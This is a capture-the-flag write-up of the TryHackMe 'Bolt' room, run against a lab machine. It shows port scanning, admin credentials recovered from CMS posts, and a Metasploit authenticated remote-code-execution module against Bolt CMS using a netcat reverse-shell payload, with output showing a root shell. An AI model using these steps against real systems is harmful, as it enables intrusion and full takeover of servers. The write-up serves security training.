---
layout: post
title: "Bolt - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - eop
  - php
date: 2021/05/04 19:05:00
thumbnail: /images/TryHackMe/bolt.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Bolt
- **Profile:** [tryhackme.com](https://tryhackme.com/room/bolt)
- **Difficulty:** Easy
- **Description**: A hero is unleashed

![Bolt](/images/TryHackMe/bolt.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap exploit-db metasploit
```

## Network enumeration

Port and service scan with nmap:

```
# Nmap 7.91 scan initiated Tue May  4 09:25:29 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.128.191
Nmap scan report for 10.10.128.191
Host is up (0.027s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Tue, 04 May 2021 07:26:08 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Tue, 04 May 2021 07:26:08 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 4f78f3
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest:
|     HTTP/1.0 200 OK
|     Date: Tue, 04 May 2021 07:26:07 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Tue, 04 May 2021 07:26:07 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: d4017c
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Bolt | A hero is unleashed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=5/4%Time=6090F70F%P=x86_64-unknown-linux-gnu%
SF:r(GetRequest,28D5,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Tue,\x2004\x20May
SF:\x202021\x2007:26:07\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x2
SF:0PHP/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x
SF:20public,\x20s-maxage=600\r\nDate:\x20Tue,\x2004\x20May\x202021\x2007:2
SF:6:07\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-
SF:Token:\x20d4017c\r\n\r\n<!doctype\x20html>\n<html\x20lang=\"en-GB\">\n\
SF:x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset
SF:=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"
SF:\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<title>Bolt\x20\|\
SF:x20A\x20hero\x20is\x20unleashed</title>\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<link\x20href=\"https://fonts\.googleapis\.com/css\?family=Bitter\|Ro
SF:boto:400,400i,700\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/bulma\.
SF:css\?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"styl
SF:esheet\"\x20href=\"/theme/base-2018/css/theme\.css\?6cb66bfe9f\">\n\x20
SF:\x20\x20\x20\t<meta\x20name=\"generator\"\x20content=\"Bolt\">\n\x20\x2
SF:0\x20\x20\t<link\x20rel=\"canonical\"\x20href=\"http://0\.0\.0\.0:8000/
SF:\">\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body\x20class=\"front\">
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20<a\x20")%r(FourOhFourRequest,16C3,"HT
SF:TP/1\.0\x20404\x20Not\x20Found\r\nDate:\x20Tue,\x2004\x20May\x202021\x2
SF:007:26:08\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.
SF:32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20private,\
SF:x20must-revalidate\r\nDate:\x20Tue,\x2004\x20May\x202021\x2007:26:08\x2
SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\npragma:\x20no-c
SF:ache\r\nexpires:\x20-1\r\nX-Debug-Token:\x204f78f3\r\n\r\n<!doctype\x20
SF:html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\.0\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<title>Bolt\x20\|\x20A\x20hero\x20is\x20unleashed</title>\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"https://fonts\.googlea
SF:pis\.com/css\?family=Bitter\|Roboto:400,400i,700\"\x20rel=\"stylesheet\
SF:">\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href
SF:=\"/theme/base-2018/css/bulma\.css\?8ca0842ebb\">\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/
SF:theme\.css\?6cb66bfe9f\">\n\x20\x20\x20\x20\t<meta\x20name=\"generator\
SF:"\x20content=\"Bolt\">\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20<a\x20href=\"#main-content\"\x20class
SF:=\"vis");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  4 09:26:18 2021 -- 1 IP address (1 host up) scanned in 49.52 seconds
```

Let's add a domain for this IP:

```
$ grep bolt /etc/hosts
10.10.128.191 bolt.htm
```

## Web discovery

The app at http://bolt.htm:8000/ is built using Bolt CMS.

We can find some credentials in the posts, Jake (Admin) username is {% spoiler *bolt* %} and
password is {% spoiler *boltadmin123* %}.

We can log in at http://bolt.htm:8000/bolt/login and see the version displayed
at the bottom of the page.

## Web exploitation

With luck, we'll be able to use the authenticated RCE:

```
$ searchsploit bolt
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow            | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                        | php/webapps/47501.txt
Bolt CMS < 3.6.2 - Cross-Site Scripting                                             | php/webapps/46014.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                               | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                 | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Execution                                | php/webapps/48296.py
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                             | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities         | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion                                                | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                         | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                       | php/remote/38196.rb
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 48296
  Exploit: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48296
     Path: /usr/share/exploitdb/exploits/php/webapps/48296.py
File Type: Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
```

We can set up metapsloit then:

```
msf6 exploit(unix/webapp/bolt_authenticated_rce) > options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD             boltadmin123           yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS               10.10.128.191          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                8000                   yes       The target port (TCP)
   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080                   yes       The local port to listen on.
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME             bolt                   yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.19.77       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)
```

I didn't expect that be it seems we're directly root:

```
msf6 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 10.9.19.77:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "ctyd".
[*] Found 2 potential token(s) for creating .php files.
[+] Deleted file bofbmumbn.php.
[+] Used token fd7efd6a0e32e5d22f10a8279d to create zddoafevavb.php.
[*] Attempting to execute the payload via "/files/zddoafevavb.php?ctyd=`payload`"
[*] Command shell session 1 opened (10.9.19.77:4444 -> 10.10.128.191:34426) at 2021-05-04 09:47:43 +0200
[!] No response, may have executed a blocking payload!
[+] Deleted file zddoafevavb.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)

ls /home
bolt
composer-setup.php
flag.txt
```
